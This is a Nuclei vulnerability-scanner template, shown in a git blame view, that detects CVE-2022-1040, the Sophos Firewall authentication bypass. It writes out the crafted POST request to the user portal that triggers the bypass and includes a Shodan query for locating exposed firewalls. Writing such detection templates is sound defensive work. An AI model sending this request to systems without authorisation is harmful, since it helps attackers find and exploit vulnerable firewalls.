nuclei-templates/http/cves/2022/CVE-2022-1040.yaml

55 lines
1.6 KiB
YAML
Raw Normal View History

2022-05-06 14:57:40 +00:00
id: CVE-2022-1040
info:
name: Sophos Firewall <=18.5 MR3 - Remote Code Execution
2022-05-06 14:57:40 +00:00
author: For3stCo1d
severity: critical
2022-05-09 17:21:50 +00:00
description: |
Sophos Firewall version v18.5 MR3 and older contains an authentication bypass vulnerability in the User Portal and Webadmin which could allow a remote attacker to execute code.
2023-09-06 11:59:08 +00:00
remediation: |
Upgrade to a patched version of Sophos Firewall (>=18.5 MR4) to mitigate this vulnerability.
2022-05-06 14:57:40 +00:00
reference:
- https://github.com/killvxk/CVE-2022-1040
2022-05-09 13:54:47 +00:00
- https://github.com/CronUp/Vulnerabilidades/blob/main/CVE-2022-1040_checker
2022-05-06 16:17:16 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-1040
- https://www.sophos.com/en-us/security-advisories/sophos-sa-20220325-sfos-rce
2022-05-06 14:57:40 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-05-06 14:57:40 +00:00
cvss-score: 9.8
cve-id: CVE-2022-1040
cwe-id: CWE-287
2023-08-31 11:46:18 +00:00
epss-score: 0.97499
epss-percentile: 0.99961
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:o:sophos:sfos:*:*:*:*:*:*:*:*
2022-05-09 17:21:50 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: sophos
product: sfos
2023-09-06 11:59:08 +00:00
shodan-query: http.title:"Sophos"
tags: cve,cve2022,sophos,firewall,auth-bypass,rce,kev
2022-05-06 14:57:40 +00:00
http:
2022-05-06 14:57:40 +00:00
- method: POST
path:
2022-05-06 16:25:41 +00:00
- "{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"🦞\":\"test\"}"
2022-05-09 17:21:50 +00:00
2022-05-06 14:57:40 +00:00
headers:
2022-05-06 16:25:41 +00:00
X-Requested-With: "XMLHttpRequest"
2022-05-06 14:57:40 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-05-09 13:54:47 +00:00
- "{\"status\":\"Session Expired\"}"
2022-05-06 14:57:40 +00:00
- type: word
part: header
words:
- "Server: xxxx"
- type: status
status:
- 200